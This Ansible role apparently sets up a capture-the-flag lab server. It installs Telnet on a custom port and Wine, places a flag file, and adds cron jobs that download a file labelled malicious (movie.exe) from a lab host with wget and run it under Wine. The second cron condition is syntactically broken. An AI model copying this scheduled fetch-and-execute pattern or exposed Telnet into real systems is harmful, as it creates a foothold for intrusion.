---
# This is a role for setting up the server.

- name: Install packages
  apt:
    pkg:
     - telnetd
     - wget
     - net-tools
     - wine
     - wine32
     - libwine
    update_cache: yes

- name: Change Telnet port
  replace:
    path: /etc/services
    regexp: '23/tcp'
    replace: '{{ telnet_port }}/tcp'

# xinetd must be installed after changing the Telnet port
- name: Install xinetd package
  apt:
    name: xinetd

- name: Place flag
  copy:
    dest: '/home/{{ username }}/flag.txt'
    owner: '{{ username }}'
    content: "{{ flag }}\n"
    mode: '0600'

- name: Create alias for client
  lineinfile:
    path: '/etc/hosts'
    line: '192.168.50.5 client'

- name: Cron job for get malicious file
  cron:
   name: "movie file get"
   minute: "1"
   job: "if [ ! -s /home/{{ username }}/movie.exe ]; then wget -O /home/{{ username }}/movie.exe http://192.168.50.5/movie.exe; fi"

- name: Cron job for run malicious file
  cron:
   name: "movie file run"
   minute: "2"
   job: "if [ ! pgrep -x "movie.exe" ]; then wine /home/{{ username }}/movie.exe; fi"
...
